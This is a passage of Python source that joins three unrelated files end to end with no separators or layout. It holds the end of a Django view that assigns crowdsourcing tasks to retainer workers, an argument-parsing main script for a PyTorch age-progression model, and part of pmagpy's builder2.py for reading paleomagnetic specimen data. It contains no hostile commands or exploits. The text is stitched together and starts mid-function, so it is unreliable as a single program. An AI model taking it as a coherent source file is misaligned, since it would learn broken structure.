'worker_id'], ValueError("retainer assignment context missing required keys.")) try: task = (model_spec.task_model.objects .select_related('group__retainer_pool') .get(task_id=context['task_id'])) group = task.group pool = group.retainer_pool worker = model_spec.worker_model.objects.get(worker_id=context['worker_id']) logger.info('Retainer task %s requested work.' % task) except Exception: # Issue loading models from IDs, finish this assignment return HttpResponse(json.dumps({'start': False, 'pool_status': 'finished'}), content_type='application/json') exp_config = json.loads(group.global_config).get('experimental') if exp_config: straggler_mitigation = exp_config.get('mitigate_stragglers', False) straggler_routing_policy = exp_config.get('straggler_routing_policy', 'random') churn_threshold = exp_config.get('churn_threshold') else: straggler_mitigation = False churn_threshold = None # Acquire an exclusive lock to avoid duplicate assignments lockf = open('/tmp/ASSIGNMENT_LOCK', 'wb') logger.debug("Locking assignment lock...") locks.lock(lockf, locks.LOCK_EX) # Don't assign a task if the worker is on reserve or the pool is inactive. on_reserve = (task.assignments.filter(worker=worker, on_reserve=True).exists() if churn_threshold is not None else False) pool_inactive = pool.status not in (RetainerPoolStatus.ACTIVE, RetainerPoolStatus.REFILLING, RetainerPoolStatus.IDLE) no_work_response = HttpResponse(json.dumps({'start': False, 'pool_status': pool.get_status_display()}), content_type='application/json') if on_reserve: logger.info("Worker on reserve: not assigning work.") return no_work_response if pool_inactive: logger.info("Pool still recruiting or otherwise inactive: not assigning work.") return no_work_response # Look for a task the worker is already assigned to assignment_task = None existing_assignments = (worker.assignments .filter(finished_at__isnull=True) .filter(task__group__retainer_pool=pool) .exclude(task__task_type='retainer')) logger.info('Looking for assignments for retainer worker...') if existing_assignments.exists(): assignment_task = existing_assignments[0].task logger.info('Found an existing assignment for this worker') else: # Look for open tasks incomplete_tasks = ( # incomplete tasks model_spec.task_model.objects.filter(is_complete=False) # in this pool's tasks .filter(group__retainer_pool=pool) # that aren't dummy retainer tasks .exclude(task_type='retainer') # that the worker hasn't worked on already .exclude(assignments__worker=worker)) # First check if the open tasks haven't been assigned to enough workers. # TODO: avoid gross SQL non_terminated_assignments = """ SELECT COUNT(*) FROM %(crowdname)s_%(assignment_model)s WHERE %(crowdname)s_%(assignment_model)s.terminated = False AND %(crowdname)s_%(assignment_model)s.task_id = %(crowdname)s_%(task_model)s.task_id """ % { 'crowdname': crowd_name, 'assignment_model': model_spec.assignment_model.__name__.lower(), 'task_model': model_spec.task_model.__name__.lower(), } open_tasks = incomplete_tasks.extra( where=["num_assignments > (%s)" % non_terminated_assignments]) if open_tasks.exists(): logger.info('Found an unassigned but open task') assignment_task = open_tasks.order_by('?')[0] # Then, check if there in-progress tasks with enough assignments. elif incomplete_tasks.exists(): if not straggler_mitigation: # only assign tasks that have been abandoned # Bad performance characteristics! consider rewriting. active_workers = set(pool.active_workers.all()) abandoned_tasks = [ t for t in incomplete_tasks if len([a for a in t.assignments.select_related('worker').all() if a.worker in active_workers]) < t.num_assignments] if abandoned_tasks: logger.info('Found an assigned but abandoned task.') assignment_task = random.choice(abandoned_tasks) else: logger.info('All tasks are assigned.') # Straggler mitigation else: logger.info('Assigning to an active task for straggler mitigation with policy %s.' % straggler_routing_policy) if straggler_routing_policy == 'random': assignment_task = incomplete_tasks.order_by('?')[0] elif straggler_routing_policy == 'oldest': now = timezone.now() annotated = incomplete_tasks.annotate(start=Min('assignments__assigned_at')) weights = [(now - t.start).total_seconds() for t in annotated] weights = np.array(weights) / sum(weights) assignment_task = np.random.choice(list(annotated), size=1, p=weights)[0] elif straggler_routing_policy == 'young-workers': now = timezone.now() weights = [ 1 / (now - min([a.worker.assignments .filter(task__task_type='retainer', task__group__retainer_pool=pool) .order_by('assigned_at')[0].assigned_at for a in task.assignments.all()])).total_seconds() for task in incomplete_tasks] weights = np.array(weights) / sum(weights) assignment_task = np.random.choice(list(incomplete_tasks), size=1, p=weights)[0] elif straggler_routing_policy == 'fair': # assign to the task with the fewest assignments assignment_task = (incomplete_tasks .extra(select={'n_assignments': non_terminated_assignments}, order_by=['n_assignments']))[0] else: logger.info('Unkown straggler routing policy: %s. Using random instead...' % straggler_routing_policy) assignment_task = incomplete_tasks.order_by('?')[0] # return a url to the assignment if assignment_task: # create the assignment if necessary try: logger.info('Looking up assignment...') assignment = worker.assignments.get( task=assignment_task, worker=worker) if not assignment.retainer_session_task: assignment.retainer_session_task = task assignment.save() except model_spec.assignment_model.DoesNotExist: logger.info('No assignment found: creating new one.') assignment_id = str(uuid.uuid4()) assignment = model_spec.assignment_model.objects.create( assignment_id=assignment_id, worker=worker, task=assignment_task, retainer_session_task=task) if not assignment_task.group.work_start_time: assignment_task.group.work_start_time = timezone.now() assignment_task.group.save() url_args = { 'crowd_name': crowd_name, 'worker_id': worker.worker_id, 'task_id': assignment_task.task_id, } response_data = json.dumps({ 'start': True, 'task_url': reverse('basecrowd:get_retainer_assignment', kwargs=url_args), 'task_id': assignment_task.task_id, 'pool_status': pool.get_status_display() }) logger.info('Linking task to assignment.') return HttpResponse(response_data, content_type='application/json') else: logger.info('No tasks found!') return no_work_response except Exception as e: logger.exception(e) raise e finally: # Release the assignment lock--either an assignment has been created in the DB, or an error occurred. logger.debug("Unlocking assignment lock...") locks.unlock(lockf) lockf.close() # we need this view to load in AMT's iframe, so disable Django's built-in # clickjacking protection. @xframe_options_exempt @require_GET def get_retainer_assignment(request, crowd_name, worker_id, task_id): # get the interface implementation from the crowd name. interface, model_spec = CrowdRegistry.get_registry_entry(crowd_name) logger.info('Retainer worker fetched task assignment.') # fetch assignment if it already exists (e.g. the user refreshed the browser). try: assignment_id = model_spec.assignment_model.objects.get( task_id=task_id, worker_id=worker_id).assignment_id except model_spec.assignment_model.DoesNotExist: assignment_id = str(uuid.uuid4()) context = { 'task_id': task_id, 'worker_id': worker_id, 'is_accepted': True, 'assignment_id': assignment_id } return _get_assignment(request, crowd_name, interface, model_spec, context) @require_POST @csrf_exempt def finish_pool(request, crowd_name): pool_id = request.POST.get('pool_id') interface, model_spec = CrowdRegistry.get_registry_entry(crowd_name) try: pool = model_spec.retainer_pool_model.objects.get(external_id=pool_id) except model_spec.retainer_pool_model.DoesNotExist: return HttpResponse(json.dumps({'error': 'Invalid pool id'})) _finish_pool(pool, model_spec) logger.info("Retainer pool %s finished" % pool) return HttpResponse(json.dumps({'status': 'ok'})) def _finish_pool(pool, model_spec): # Mark open sessions as interrupted so we don't penalize them unfairly. (model_spec.assignment_model.objects .filter(task__group__retainer_pool=pool, task__task_type='retainer') .exclude(Q(finished_at__isnull=False) & Q(terminated=False)) .update(pool_ended_mid_assignment=True)) pool.status = RetainerPoolStatus.FINISHED pool.finished_at = timezone.now() pool.save() @require_POST @csrf_exempt def understands_retainer(request, crowd_name, worker_id): interface, model_spec = CrowdRegistry.get_registry_entry(crowd_name) try: worker = model_spec.worker_model.objects.get(worker_id=worker_id) except model_spec.worker_model.DoesNotExist: return HttpResponse(json.dumps({'error': 'Invalid worker id'})) worker.understands_retainer = True worker.save() logger.info('%s understands the retainer model.' % worker) return HttpResponse(json.dumps({'status': 'ok'})) import model import consts import logging import os import re import numpy as np import argparse import sys import random import datetime import torch from utils import * from torchvision.datasets.folder import pil_loader import gc import torch gc.collect() assert sys.version_info >= (3, 6),\ "This script requires Python >= 3.6" # TODO 3.7? assert tuple(int(ver_num) for ver_num in torch.__version__.split('.')) >= (0, 4, 0),\ "This script requires PyTorch >= 0.4.0" # TODO 0.4.1? def str_to_gender(s): s = str(s).lower() if s in ('m', 'man', '0'): return 0 elif s in ('f', 'female', '1'): return 1 else: raise KeyError("No gender found") def str_to_bool(s): s = s.lower() if s in ('true', 't', 'yes', 'y', '1'): return True elif s in ('false', 'f', 'no', 'n', 'o'): return False else: raise KeyError("Invalid boolean") if __name__ == '__main__': parser = argparse.ArgumentParser(description='AgeProgression on PyTorch.', formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('--mode', choices=['train', 'test'], default='train') # train params parser.add_argument('--epochs', '-e', default=1, type=int) parser.add_argument( '--models-saving', '--ms', dest='models_saving', choices=('always', 'last', 'tail', 'never'), default='always', type=str, help='Model saving preference.{br}' '\talways: Save trained model at the end of every epoch (default){br}' '\tUse this option if you have a lot of free memory and you wish to experiment with the progress of your results.{br}' '\tlast: Save trained model only at the end of the last epoch{br}' '\tUse this option if you don\'t have a lot of free memory and removing large binary files is a costly operation.{br}' '\ttail: "Safe-last". Save trained model at the end of every epoch and remove the saved model of the previous epoch{br}' '\tUse this option if you don\'t have a lot of free memory and removing large binary files is a cheap operation.{br}' '\tnever: Don\'t save trained model{br}' '\tUse this option if you only wish to collect statistics and validation results.{br}' 'All options except \'never\' will also save when interrupted by the user.'.format(br=os.linesep) ) parser.add_argument('--batch-size', '--bs', dest='batch_size', default=64, type=int) parser.add_argument('--weight-decay', '--wd', dest='weight_decay', default=1e-5, type=float) parser.add_argument('--learning-rate', '--lr', dest='learning_rate', default=2e-4, type=float) parser.add_argument('--b1', '-b', dest='b1', default=0.5, type=float) parser.add_argument('--b2', '-B', dest='b2', default=0.999, type=float) parser.add_argument('--shouldplot', '--sp', dest='sp', default=False, type=bool) # test params parser.add_argument('--age', '-a', required=False, type=int) parser.add_argument('--gender', '-g', required=False, type=str_to_gender) parser.add_argument('--watermark', '-w', action='store_true') # shared params parser.add_argument('--cpu', '-c', action='store_true', help='Run on CPU even if CUDA is available.') parser.add_argument('--load', '-l', required=False, default=None, help='Trained models path for pre-training or for testing') parser.add_argument('--input', '-i', default=None, help='Training dataset path (default is {}) or testing image path'.format(default_train_results_dir())) parser.add_argument('--output', '-o', default='') parser.add_argument('-z', dest='z_channels', default=50, type=int, help='Length of Z vector') args = parser.parse_args() consts.NUM_Z_CHANNELS = args.z_channels net = model.Net() if not args.cpu and torch.cuda.is_available(): net.cuda() if args.mode == 'train': betas = (args.b1, args.b2) if args.load is None else None weight_decay = args.weight_decay if args.load is None else None lr = args.learning_rate if args.load is None else None if args.load is not None: net.load(args.load) print("Loading pre-trained models from {}".format(args.load)) data_src = args.input or consts.UTKFACE_DEFAULT_PATH print("Data folder is {}".format(data_src)) results_dest = args.output or default_train_results_dir() os.makedirs(results_dest, exist_ok=True) print("Results folder is {}".format(results_dest)) with open(os.path.join(results_dest, 'session_arguments.txt'), 'w') as info_file: info_file.write(' '.join(sys.argv)) log_path = os.path.join(results_dest, 'log_results.log') if os.path.exists(log_path): os.remove(log_path) logging.basicConfig(filename=log_path, level=logging.DEBUG) net.teach( utkface_path=data_src, batch_size=args.batch_size, betas=betas, epochs=args.epochs, weight_decay=weight_decay, lr=lr, should_plot=args.sp, where_to_save=results_dest, models_saving=args.models_saving ) elif args.mode == 'test': if args.load is None: raise RuntimeError("Must provide path of trained models") net.load(path=args.load, slim=True) results_dest = args.output or default_test_results_dir() if not os.path.isdir(results_dest): os.makedirs(results_dest) image_tensor = pil_to_model_tensor_transform(pil_loader(args.input)).to(net.device) net.test_single( image_tensor=image_tensor, age=args.age, gender=args.gender, target=results_dest, watermark=args.watermark ) pmagpy/builder2.py #!/usr/bin/env python """ Module for building or reading in specimen, sample, site, and location data. """ from __future__ import print_function import os from builtins import str from builtins import range from builtins import object import pmagpy.pmag as pmag import pmagpy.validate_upload2 as validate_upload class ErMagicBuilder(object): """ more object oriented builder """ def __init__(self, WD, data_model=None): self.WD = WD self.measurements = [] self.specimens = [] self.samples = [] self.sites = [] self.locations = [] self.results = [] self.write_ages = False self.ancestry = [None, 'specimen', 'sample', 'site', 'location', None] # self.double = ['magic_method_codes', 'specimen_description', 'sample_description', 'site_description'] # self.incl_pmag_data = set(['result']) if not data_model: self.data_model = validate_upload.get_data_model() else: self.data_model = data_model self.data_lists = {'specimen': [self.specimens, Specimen, self.add_specimen], 'sample': [self.samples, Sample, self.add_sample], 'site': [self.sites, Site, self.add_site], 'location': [self.locations, Location, self.add_location], 'age': [self.sites, Site, self.add_site], 'result': [self.results, Result, self.add_result], 'measurement': [self.measurements, Measurement, self.add_measurement]} self.add_methods = {'specimen': self.add_specimen, 'sample': self.add_sample, 'site': self.add_site, 'location': self.add_location, 'age': None, 'result': self.add_result} self.update_methods = {'specimen': self.change_specimen, 'sample': self.change_sample, 'site': self.change_site, 'location': self.change_location, 'age': self.change_age, 'result': self.change_result} self.delete_methods = {'specimen': self.delete_specimen, 'sample': self.delete_sample, 'site': self.delete_site, 'location': self.delete_location, 'age': None, 'result': self.delete_result} # actual is at position 0, reqd is at position 1, optional at position 2 self.headers = { 'measurement': {'er': [[], [], []], 'pmag': [[], [], []]}, 'specimen': {'er': [[], [], []], 'pmag': [[], [], []]}, 'sample': {'er': [[], [], []], 'pmag': [[], [], []]}, 'site': {'er': [[], [], []], 'pmag': [[], [], []]}, 'location': {'er': [[], [], []], 'pmag': [[], [], []]}, 'age': {'er': [[], [], []], 'pmag': [[], [], []]}, 'result': {'er': [[], [], []], 'pmag': [[], [], []]} } self.first_age_headers = ['er_citation_names', 'magic_method_codes', 'age_unit'] self.age_type = 'site' def make_name_list(self, obj_list): name_list = [] for obj in obj_list: try: name_list.append(obj.name) except AttributeError: if obj: name_list.append(obj) else: name_list.append('') return name_list def get_name(self, pmag_object, *args): for arg in args: try: pmag_object = pmag_object.__getattribute__(arg) except AttributeError: return '' return pmag_object def find_by_name(self, item_name, items_list, name_list=None): """ Return item from items_list with name item_name. """ if not name_list: names = [item.name for item in items_list if item] else: names = name_list if item_name in names: ind = names.index(item_name) return items_list[ind] return False def find_or_create_by_name(self, item_name, items_list, item_type): """ See if item with item_name exists in item_list. If not, create that item. Either way, return an item of type item_type. """ item = self.find_by_name(item_name, items_list) if not item: item = self.data_lists[item_type][2](item_name, None) return item def init_default_headers(self): """ initialize default required headers. if there were any pre-existing headers, keep them also. """ if not self.data_model: self.data_model = validate_upload.get_data_model() if not self.data_model: print("Can't access MagIC-data-model at the moment.\nIf you are working offline, make sure MagIC-data-model.txt is in your PmagPy directory (or download it from https://github.com/ltauxe/PmagPy and put it in your PmagPy directory).\nOtherwise, check your internet connection") return False # actual is at position 0, reqd is at position 1, optional at position 2 self.headers['measurement']['er'][1], self.headers['measurement']['er'][2] = self.get_headers('magic_measurements') self.headers['specimen']['er'][1], self.headers['specimen']['er'][2] = self.get_headers('er_specimens') self.headers['sample']['er'][1], self.headers['sample']['er'][2] = self.get_headers('er_samples') self.headers['site']['er'][1], self.headers['site']['er'][2] = self.get_headers('er_sites') self.headers['location']['er'][1], self.headers['location']['er'][2] = self.get_headers('er_locations') self.headers['age']['er'][1], self.headers['age']['er'][2] = self.get_headers('er_ages') self.headers['result']['pmag'][1], self.headers['result']['pmag'][2] = self.get_headers('pmag_results') self.headers['specimen']['pmag'][1], self.headers['specimen']['pmag'][2] = self.get_headers('pmag_specimens') self.headers['sample']['pmag'][1], self.headers['sample']['pmag'][2] = self.get_headers('pmag_samples') self.headers['site']['pmag'][1], self.headers['site']['pmag'][2] = self.get_headers('pmag_sites') def get_headers(self, data_type): try: data_dict = self.data_model[data_type] except KeyError: return [], [] reqd_headers = sorted([header for header in list(data_dict.keys()) if data_dict[header]['data_status'] == 'Required']) optional_headers = sorted([header for header in list(data_dict.keys()) if data_dict[header]['data_status'] != 'Required']) return reqd_headers, optional_headers def init_actual_headers(self): def headers(data_list, reqd_er_headers, reqd_pmag_headers): if data_list: er_header, pmag_header = set([]), set([]) for item in data_list: for key in list(item.er_data.keys()): er_header.add(key) for key in list(item.pmag_data.keys()): pmag_header.add(key) ## old non-thorough way #er_header = data_list[0].er_data.keys() #pmag_header = data_list[0].pmag_data.keys() er_header = remove_list_headers(er_header) pmag_header = remove_list_headers(pmag_header) else: er_header = remove_list_headers(reqd_er_headers) pmag_header = remove_list_headers(reqd_pmag_headers) return list(er_header), list(pmag_header) self.headers['measurement']['er'][0], self.headers['measurement']['pmag'][0] = headers(self.measurements, self.headers['measurement']['er'][1], self.headers['measurement']['pmag'][1]) self.headers['specimen']['er'][0], self.headers['specimen']['pmag'][0] = headers(self.specimens, self.headers['specimen']['er'][1], self.headers['specimen']['pmag'][1]) self.headers['sample']['er'][0], self.headers['sample']['pmag'][0] = headers(self.samples, self.headers['sample']['er'][1], self.headers['sample']['pmag'][1]) self.headers['site']['er'][0], self.headers['site']['pmag'][0] = headers(self.sites, self.headers['site']['er'][1], self.headers['site']['pmag'][1]) self.headers['location']['er'][0], self.headers['location']['pmag'][0] = headers(self.locations, self.headers['location']['er'][1], self.headers['location']['pmag'][1]) age_list = self.data_lists[self.age_type][0] if age_list: age_headers = [] for item in age_list: for header in list(item.age_data.keys()): if header not in age_headers: age_headers.append(header) self.headers['age']['er'][0] = age_headers else: self.headers['age']['er'][0] = remove_list_headers(self.headers['age']['er'][1]) # make sure that some recommended but not required age headers are added in for head in self.first_age_headers: if head not in self.headers['age']['er'][0]: self.headers['age']['er'][0].append(head) self.headers['result']['er'][0], self.headers['result']['pmag'][0] = headers(self.results, self.headers['result']['er'][1], self.headers['result']['pmag'][1]) def add_measurement(self, exp_name, meas_num, spec_name=None, er_data=None, pmag_data=None): """ Find actual data object for specimen. Then create a measurement belonging to that specimen and add it to the data object """ specimen = self.find_by_name(spec_name, self.specimens) measurement = Measurement(exp_name, meas_num, specimen, er_data) self.measurements.append(measurement) return measurement def change_specimen(self, old_spec_name, new_spec_name, new_sample_name=None, new_er_data=None, new_pmag_data=None, replace_data=False): """ Find actual data objects for specimen and sample. Then call Specimen class change method to update specimen name and data. """ specimen = self.find_by_name(old_spec_name, self.specimens) if not specimen: print('-W- {} is not a currently existing specimen, so cannot be updated'.format(old_spec_name)) return False if new_sample_name: new_sample = self.find_by_name(new_sample_name, self.samples) if not new_sample: print("""-W- {} is not a currently existing sample. Creating a new sample named: {} """.format(new_sample_name, new_sample_name)) new_sample = self.add_sample(new_sample_name) else: new_sample = None specimen.change_specimen(new_spec_name, new_sample, new_er_data, new_pmag_data, replace_data) return specimen def delete_specimen(self, spec_name): """ Remove specimen with name spec_name from self.specimens. If the specimen belonged to a sample, remove it from the sample's specimen list. """ specimen = self.find_by_name(spec_name, self.specimens) if not specimen: return False sample = specimen.sample if sample: sample.specimens.remove(specimen) self.specimens.remove(specimen) del specimen return [] def add_specimen(self, spec_name, samp_name=None, er_data=None, pmag_data=None): """ Create a Specimen object and add it to self.specimens. If a sample name is provided, add the specimen to sample.specimens as well. """ if samp_name: sample = self.find_by_name(samp_name, self.samples) if not sample: print("""-W- {} is not a currently existing sample. Creating a new sample named: {} """.format(samp_name, samp_name)) sample = self.add_sample(samp_name) else: sample = None specimen = Specimen(spec_name, sample, self.data_model, er_data, pmag_data) self.specimens.append(specimen) if sample: sample.specimens.append(specimen) return specimen def change_sample(self, old_samp_name, new_samp_name, new_site_name=None, new_er_data=None, new_pmag_data=None, replace_data=False): """ Find actual data objects for sample and site. Then call Sample class change method to update sample name and data.. """ sample = self.find_by_name(old_samp_name, self.samples) if not sample: print('-W- {} is not a currently existing sample, so it cannot be updated'.format(old_samp_name)) return False if new_site_name: new_site = self.find_by_name(new_site_name, self.sites) if not new_site: print("""-W- {} is not a currently existing site. Adding site named: {}""".format(new_site_name, new_site_name))#sample.site or '*empty*', sample) new_site = self.add_site(new_site_name) else: new_site = None sample.change_sample(new_samp_name, new_site, new_er_data, new_pmag_data, replace_data) return sample def add_sample(self, samp_name, site_name=None, er_data=None, pmag_data=None): """ Create a Sample object and add it to self.samples. If a site name is provided, add the sample to site.samples as well. """ if site_name: site = self.find_by_name(site_name, self.sites) if not site: print("""-W- {} is not a currently existing site. Creating a new site named: {} """.format(site_name, site_name)) site = self.add_site(site_name) else: site = None sample = Sample(samp_name, site, self.data_model, er_data, pmag_data) self.samples.append(sample) if site: site.samples.append(sample) return sample def delete_sample(self, sample_name, replacement_samp=None): """ Remove sample with name sample_name from self.samples. If the sample belonged to a site, remove it from the site's sample list. If the sample had any specimens, change specimen.sample to "". """ sample = self.find_by_name(sample_name, self.samples) if not sample: return False specimens = sample.specimens site = sample.site if site: site.samples.remove(sample) self.samples.remove(sample) for spec in specimens: spec.sample = "" return specimens def change_age(self, old_name, new_age_data=None, item_type='site', replace_data=False): item = self.find_by_name(old_name, self.data_lists[item_type][0]) if replace_data: default_age_data = {key: '' for key in self.headers['age']['er'][1]} item.age_data = combine_dicts(new_age_data, default_age_data) else: item.age_data = combine_dicts(new_age_data, item.age_data) return item def change_site(self, old_site_name, new_site_name, new_location_name=None, new_er_data=None, new_pmag_data=None, replace_data=False): """ Find actual data objects for site and location. Then call the Site class change method to update site name and data. """ site = self.find_by_name(old_site_name, self.sites) if not site: print('-W- {} is not a currently existing site, so it cannot be updated.'.format(old_site_name)) return False if new_location_name: if site.location: old_location = self.find_by_name(site.location.name, self.locations) if old_location: old_location.sites.remove(site) new_location = self.find_by_name(new_location_name, self.locations) if not new_location: print("""-W- {} is not a currently existing location. Adding location with name: {}""".format(new_location_name, new_location_name)) new_location = self.add_location(new_location_name) new_location.sites.append(site) else: new_location = None ## check all declinations/azimuths/longitudes in range 0=>360. #for key, value in new_er_data.items(): # new_er_data[key] = pmag.adjust_to_360(value, key) site.change_site(new_site_name, new_location, new_er_data, new_pmag_data, replace_data) return site def add_site(self, site_name, location_name=None, er_data=None, pmag_data=None): """ Create a Site object and add it to self.sites. If a location name is provided, add the site to location.sites as well. """ if location_name: location = self.find_by_name(location_name, self.locations) if not location: location = self.add_location(location_name) else: location = None ## check all declinations/azimuths/longitudes in range 0=>360. #for key, value in er_data.items(): # er_data[key] = pmag.adjust_to_360(value, key) new_site = Site(site_name, location, self.data_model, er_data, pmag_data) self.sites.append(new_site) if location: location.sites.append(new_site) return new_site def delete_site(self, site_name, replacement_site=None): """ Remove site with name site_name from self.sites. If the site belonged to a location, remove it from the location's site list. If the site had any samples, change sample.site to "". """ site = self.find_by_name(site_name, self.sites) if not site: return False self.sites.remove(site) if site.location: site.location.sites.remove(site) samples = site.samples for samp in samples: samp.site = '' del site return samples def change_location(self, old_location_name, new_location_name, new_parent_name=None, new_er_data=None, new_pmag_data=None, replace_data=False): """ Find actual data object for location with old_location_name. Then call Location class change method to update location name and data. """ location = self.find_by_name(old_location_name, self.locations) if not location: print('-W- {} is not a currently existing location, so it cannot be updated.'.format(old_location_name)) return False location.change_location(new_location_name, new_er_data, new_pmag_data, replace_data) return location def add_location(self, location_name, parent_name=None, er_data=None, pmag_data=None): """ Create a Location object and add it to self.locations. """ if not location_name: return False location = Location(location_name, data_model=self.data_model, er_data=er_data, pmag_data=pmag_data) self.locations.append(location) return location def delete_location(self, location_name): """ Remove location with name location_name from self.locations. If the location had any sites, change site.location to "". """ location = self.find_by_name(location_name, self.locations) if not location: return False sites = location.sites self.locations.remove(location) for site in sites: if site: site.location = '' del location return sites def add_age(self, item_name, age_data): items_list = self.data_lists[self.age_type][0] item = self.find_by_name(item_name, items_list) if not item: msg = '-W- You have tried to add age data for {}, but there is no {} by that name'.format(item_name, self.age_type) print(msg) return False else: required = {key: '' for key in self.headers['age']['er'][1]} item.age_data = combine_dicts(age_data, required) self.write_ages = True def delete_age(self, item_name): pass def add_result(self, result_name, spec_names=None, samp_names=None, site_names=None, loc_names=None, pmag_data=None): specimens, samples, sites, locations = None, None, None, None if spec_names: specimens = [self.find_by_name(name, self.specimens) for name in spec_names] if samp_names: samples = [self.find_by_name(name, self.samples) for name in samp_names] if site_names: sites = [self.find_by_name(name, self.sites) for name in site_names] if loc_names: locations = [self.find_by_name(name, self.locations) for name in loc_names] result = Result(result_name, specimens, samples, sites, locations, pmag_data, self.data_model) self.results.append(result) return result def delete_result(self, result_name): result = self.find_by_name(result_name, self.results) if result: self.results.remove(result) del result def change_result(self, old_result_name, new_result_name, new_er_data=None, new_pmag_data=None, spec_names=None, samp_names=None, site_names=None, loc_names=None, replace_data=False): """ Find actual data object for result with old_result_name. Then call Result class change method to update result name and data. """ result = self.find_by_name(old_result_name, self.results) if not result: msg = '-W- {} is not a currently existing result, so it cannot be updated.'.format(old_result_name) print(msg) return False else: specimens, samples, sites, locations = None, None, None, None if spec_names: specimens = [self.find_or_create_by_name(spec, self.specimens, 'specimen') for spec in spec_names] if samp_names: samples = [self.find_or_create_by_name(samp, self.samples, 'sample') for samp in samp_names] if site_names: sites = [self.find_or_create_by_name(site, self.sites, 'site') for site in site_names] if loc_names: locations = [self.find_or_create_by_name(loc, self.locations, 'location') for loc in loc_names] result.change_result(new_result_name, new_pmag_data, specimens, samples, sites, locations, replace_data) return result ## Methods for reading in data def get_data(self): """ attempt to read measurements file in working directory. """ meas_file = os.path.join(self.WD, 'magic_measurements.txt') if not os.path.isfile(meas_file): print("-I- No magic_measurements.txt file") return {} try: meas_data, file_type = pmag.magic_read(meas_file) except IOError: print("-I- No magic_measurements.txt file") return {} if file_type == 'bad_file': print("-E- ERROR: Can't read magic_measurements.txt file. File is corrupted.") old_specimen_name = '' #start_time = time.time() meas_name_list = [measurement.name for measurement in self.measurements] for rec in meas_data: # get citation information citation = rec.get('er_citation_names', 'This study') if 'This study' not in citation: citation = citation.strip() + ':This study' er_data = {'er_citation_names': citation} pmag_data = {'er_citation_names': 'This study'} specimen_name = rec["er_specimen_name"] # ignore measurement if there is no specimen if specimen_name == "" or specimen_name == " ": continue # if we've moved onto a new specimen, make sure a sample/site/location # exists for that specimen if specimen_name != old_specimen_name: sample_name = rec["er_sample_name"] site_name = rec["er_site_name"] location_name = rec["er_location_name"] # add items and parents location = self.find_by_name(location_name, self.locations) if location_name and not location: location = self.add_location(location_name, er_data=er_data, pmag_data=pmag_data) site = self.find_by_name(site_name, self.sites) if site_name and not site: site = self.add_site(site_name, location_name, er_data, pmag_data) sample = self.find_by_name(sample_name, self.samples) if sample_name and not sample: sample = self.add_sample(sample_name, site_name, er_data, pmag_data) specimen = self.find_by_name(specimen_name, self.specimens) if specimen_name and not specimen: specimen = self.add_specimen(specimen_name, sample_name, er_data, pmag_data) # add child_items if sample and not self.find_by_name(specimen_name, sample.specimens): sample.specimens.append(specimen) if site and not self.find_by_name(sample_name, site.samples): site.samples.append(sample) if location and not self.find_by_name(site_name, location.sites): location.sites.append(site) exp_name = rec['magic_experiment_name'] meas_num = rec['measurement_number'] meas_name = exp_name + '_' + str(meas_num) measurement = self.find_by_name(meas_name, self.measurements, meas_name_list) if not measurement: self.add_measurement(exp_name, meas_num, specimen.name, rec) meas_name_list.append(meas_name) old_specimen_name = specimen_name #end_time = time.time() - start_time def get_all_magic_info(self): self.get_data() for child, parent in [('specimen', 'sample'), ('sample', 'site'), ('site', 'location'), ('location', '')]: print('-I- Getting {} info'.format(child)) self.get_magic_info(child, parent, 'er') if self.get_magic_info(child, parent, 'pmag'): self.incl_pmag_data.add(child) self.get_age_info() self.get_results_info() def get_magic_info(self, child_type, parent_type=None, attr='er', filename=None, sort_by_file_type=False): """ Read er_*.txt or pmag_*.txt file. If no filename is provided, use er_* or pmag_* file in WD. If sort_by_file_type, use file header to determine child, parent types, instead of passing those in as arguments. Once file is open, parse information into dictionaries for each item. If the item does not yet exist, add it to the builder data object. Then add info to the item object as object.er_data or object.pmag_data. """ parent = '' grandparent_type = None magic_name = 'er_' + child_type + '_name' expected_item_type = child_type if not filename: short_filename = attr + '_' + child_type + 's.txt' magic_file = os.path.join(self.WD, short_filename) else: short_filename = os.path.split(filename)[1] magic_file = filename attr = short_filename.split('_')[0] print('-I- Attempting to read {}'.format(magic_file)) if not os.path.isfile(magic_file): print('-W- Could not find {}'.format(magic_file)) return False # get the data from the appropriate .txt file data_dict, header, file_type = self.read_magic_file(magic_file, magic_name, sort_by_file_type=sort_by_file_type) if not data_dict: print('-W- Could not read in file: {}.\n Make sure it is a MagIC-format file'.format(magic_file)) return False item_type = file_type.split('_')[1][:-1] # if a file was named wrong, use the type of data that is actually in that file if item_type != expected_item_type: print('-W- Expected data of type: {} but instead got: {}'.format(expected_item_type, item_type)) print('-W- Using type: {}'.format(item_type)) if item_type == 'age': self.get_age_info(filename) return 'age' child_type = item_type magic_name = 'er_' + child_type + '_name' ind = self.ancestry.index(child_type) parent_type = self.ancestry[ind+1] if item_type != 'location': grandparent_type = self.ancestry[ind+2] else: grandparent_type = '' if not grandparent_type: ind = self.ancestry.index(child_type) try: grandparent_type = self.ancestry[ind+2] except IndexError: grandparent_type = None child_list, child_class, child_constructor = self.data_lists[child_type] if parent_type: parent_list, parent_class, parent_constructor = self.data_lists[parent_type] else: parent_list, parent_name = None, None for child_name in data_dict: # if there is a possible parent, try to find parent object in the data model if parent_type: parent_name = data_dict[child_name].get('er_' + parent_type + '_name', '') parent = self.find_by_name(parent_name, parent_list) if parent: remove_dict_headers(parent.er_data) remove_dict_headers(parent.pmag_data) # if there should be a parent # (meaning there is a name for it and the child object should have a parent) # but none exists in the data model, go ahead and create that parent object. if parent_name and parent_type and not parent: # try to get grandparent grandparent = None grandparent_name = None if grandparent_type: grandparent_list, grandparent_class, grandparent_constructor = self.data_lists[grandparent_type] grandparent_name = data_dict[child_name]['er_' + grandparent_type + '_name'] grandparent = self.find_by_name(grandparent_name, grandparent_list) if grandparent_name and not grandparent: grandparent = grandparent_constructor(grandparent_name, None) parent = parent_constructor(parent_name, grandparent_name) # otherwise there is no parent and none can be created, so use an empty string elif not parent: parent_name = None parent = '' child = self.find_by_name(child_name, child_list) # if the child object does not exist yet in the data model if not child: child = child_constructor(child_name, parent_name) else: # bind parent to child and child to parent if parent: child.set_parent(parent) if parent and (child not in parent.children): parent.add_child(child) # add in the appropriate data dictionary to the child object if attr == 'er': self.update_methods[child_type](child_name, child_name, parent_name, new_er_data=data_dict[child_name]) else: self.update_methods[child_type](child_name, child_name, parent_name, new_pmag_data=data_dict[child_name]) # old way #child.__setattr__(attr + '_data', data_dict[child_name]) remove_dict_headers(child.er_data) remove_dict_headers(child.pmag_data) # return child_type def get_age_info(self, filename=None): """ Read er_ages.txt file. Parse information into dictionaries for each site/sample. Then 